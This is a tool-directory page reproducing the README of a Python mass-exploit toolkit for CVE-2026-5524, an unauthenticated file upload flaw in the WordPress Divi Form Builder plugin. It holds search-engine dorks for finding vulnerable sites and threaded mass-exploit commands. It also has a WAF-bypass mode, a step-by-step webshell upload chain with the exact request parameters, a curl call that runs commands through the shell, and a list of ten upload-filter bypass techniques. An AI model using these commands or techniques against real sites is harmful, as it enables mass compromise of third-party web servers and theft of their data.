Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-5524-PoC — Python mass-exploit toolkit for CVE-2026-5524, an unauthenticated file upload RCE in the WordPress Divi Form Builder plugin, with webshell upload and command execution. | Kitploit
Tools/GitHubGitHub/iicaicai/cve-2026-5524-poc
ReconnaissanceVulnerability ScannersExploitationWeb Application ExploitationInformation GatheringWAF BypassWeb SecurityPenetration TestingRed TeamingPayload DevelopmentRemote Access Trojan
253 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
GitHub
iicaicai/cve-2026-5524-poc

CVE-2026-5524-PoC

Python mass-exploit toolkit for CVE-2026-5524, an unauthenticated file upload RCE in the WordPress Divi Form Builder plugin, with webshell upload and command execution.

View Repository
Share

CVE-2026-5524 — Divi Form Builder Unauthenticated RCE

Mass exploit toolkit for CVE-2026-5524, an unauthenticated arbitrary file upload vulnerability in the WordPress plugin Divi Form Builder <= 5.1.8 leading to remote code execution.

version Devon Aji python telegram

FieldValue
CVE2026-5524
CVSS9.8 (Critical)
VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AffectedDivi Form Builder <= 5.1.8
Patched5.1.9
TypeUnauthenticated File Upload to RCE
Researcher0xd4rk5id3 - EnvoraSec

Contents

  • Description
  • Dorks
  • Installation
  • Usage
    • Single target
    • Mass exploit
    • Advanced bypass
    • Command execution
  • Vulnerability details
  • Bypass techniques
  • Tech stack
  • Project structure
  • Attack flow
  • Disclaimer

Description

The Divi Form Builder plugin for WordPress contains an unauthenticated arbitrary file upload vulnerability. The do_image_upload() handler passes the user-controlled acceptFileTypes POST parameter directly into a regular expression used to validate file extensions. By supplying a value such as phtml, an attacker can bypass the plugin's .htaccess rule that only blocks the .php extension and upload a webshell with a PHP-executable extension (.phtml, .phar, .php5, .php7, and similar).

Once the file lands in /wp-content/uploads/de_fb_uploads/, Apache executes it as PHP, granting the attacker remote code execution as the web server user.

The issue is fixed in Divi Form Builder 5.1.9.


Dorks

FOFA

body="de_fb_obj" && body="fb_nonce"

Shodan

http.html:"de_fb_obj" http.html:"fb_nonce"

Google

inurl:"/wp-content/plugins/divi-form-builder/"

ZoomEye

app:"WordPress" && body:"de_fb_obj"

Censys

services.http.response.body: "de_fb_obj"

Installation

Requirements: Python 3.8 or newer on Linux, macOS, or WSL.

git clone https://github.com/caterscam/CVE-2026-5524-PoC/
cd CVE-2026-5524-PoC
pip3 install -r requirements.txt

requirements.txt

requests>=2.28.0
urllib3>=1.26.0

Usage

Single target

python3 CVE-2026-5524.py -u https://target.com

Mass exploit

python3 CVE-2026-5524.py -l targets.txt --shell-file bypass.phtml --aggressive --no-verify -o pwned.jsonl -t 20

Advanced bypass

For targets behind a WAF (NinjaFirewall, Wordfence, ModSecurity) or with hardened Apache or nginx configuration.

python3 CVE-2026-5524.py -u https://target.com --shell-file bypass.phtml --aggressive --no-verify --debug

Command execution

After a successful upload, the script can immediately execute a command or drop into an interactive shell.

python3 CVE-2026-5524.py -u https://target.com --cmd "id; uname -a; cat /etc/passwd"
python3 CVE-2026-5524.py -u https://target.com --shell

Flags

FlagDescription
-u URLSingle target URL
-l FILEFile containing target list, one URL per line
-t NNumber of concurrent threads (default 10)
--timeout NRequest timeout in seconds (default 15)
-o FILESave results to JSONL output file
--proxy URLRoute traffic through HTTP proxy
--nonce HASHUse a manually provided nonce, skip autodetection
--ext EXTForce a single extension instead of the full bypass list
--shellDrop into interactive RCE shell on success (single target only)
--cmd CMDExecute one command on the target, then exit
--shell-file FILEUpload a custom shell payload instead of the built-in one
--no-verifySkip the post-upload RCE verification step
--strict-verifyConfirm shell URL returns HTTP 200 to filter false positives
--user-iniUpload a .user.ini dropper for PHP-FPM environments
--htaccessUpload a .htaccess re-enabler for Apache environments
--aggressiveEnable every available bypass technique
--null-byteInclude null byte and double extension attempts
--path-traversalTry uploading to /uploads/YYYY/MM/ subdirectories
--debugPrint raw HTTP responses for diagnosis

Vulnerability details

Vulnerable code

The vulnerable handler constructs a regex from user input without sanitization.

public function do_image_upload() {
    $accepted = $_POST['acceptFileTypes'];
    $pattern  = '/\\.(' . $accepted . ')$/i';

    if (preg_match($pattern, $filename)) {
        move_uploaded_file($tmp, $dest);
    }
}

By sending acceptFileTypes=phtml, the resulting regex /\.(phtml)$/i matches filenames ending in .phtml, even though the plugin's own .htaccess file only blocks the .php extension. Apache then executes the uploaded file as PHP, producing remote code execution.

Confirmed attack chain

  1. Crawl a page that embeds a Divi Form Builder form (/, /contact, /quote, etc). Append a ?nocache=<random> parameter to defeat Varnish, WP Rocket, and other page caches that would otherwise serve a stale nonce.

  2. Extract the fb_nonce value from the localised JavaScript object:

    de_fb_obj = {"fb_nonce":"<10 hex characters>", ...}
    
  3. POST a multipart form to /wp-admin/admin-ajax.php with:

    action=de_fb_image_upload
    fb_nonce=<nonce>
    acceptFileTypes=phtml
    [email protected]
    
  4. Read the file URL from the JSON response:

    {"files":[{"name":"abc123.phtml","url":"https://target/wp-content/uploads/de_fb_uploads/abc123.phtml",...}]}
    
  5. Request the shell with a base64 encoded command:

    curl "https://target/wp-content/uploads/de_fb_uploads/abc123.phtml?x=$(echo -n id | base64)"
    

Bypass techniques

#TechniqueTargets
1Alternative PHP extensions .phtml, .phar, .php5, .php7, .php4, .pht, .shtmlPlugin .htaccess rule that only blocks .php
2Case variation .PHTML, .PHP5, .PhTmLCase-sensitive WAF signatures (NinjaFirewall)
3Double extension .phtml.jpg, .php.jpgApache mod_mime content-negotiation quirks
4Null byte .php%00.jpg, .phtml%00.txtOld PHP versions (less than 5.3.4) and certain parsers
5Trailing space or dot .php , .php.Windows IIS and older Apache versions
6Content-Type spoofing application/octet-streamWAFs that key on the multipart Content-Type header
7Upload a real .htaccess that re-enables PHP for .gif, .png, .jpg, .txt, .html, etc.Apache servers with AllowOverride All
8Upload a .user.ini with auto_prepend_filePHP-FPM environments
9Filename injection through multipart boundary manipulationProxies and WAFs that re-parse the request body
10Path traversal ../shell.phtml in the filenamePlugin directory restrictions

The script tries each technique in priority order and, when --aggressive is set, attempts every one even after the first upload reports success.


Tech stack

Exploit script

Download Tool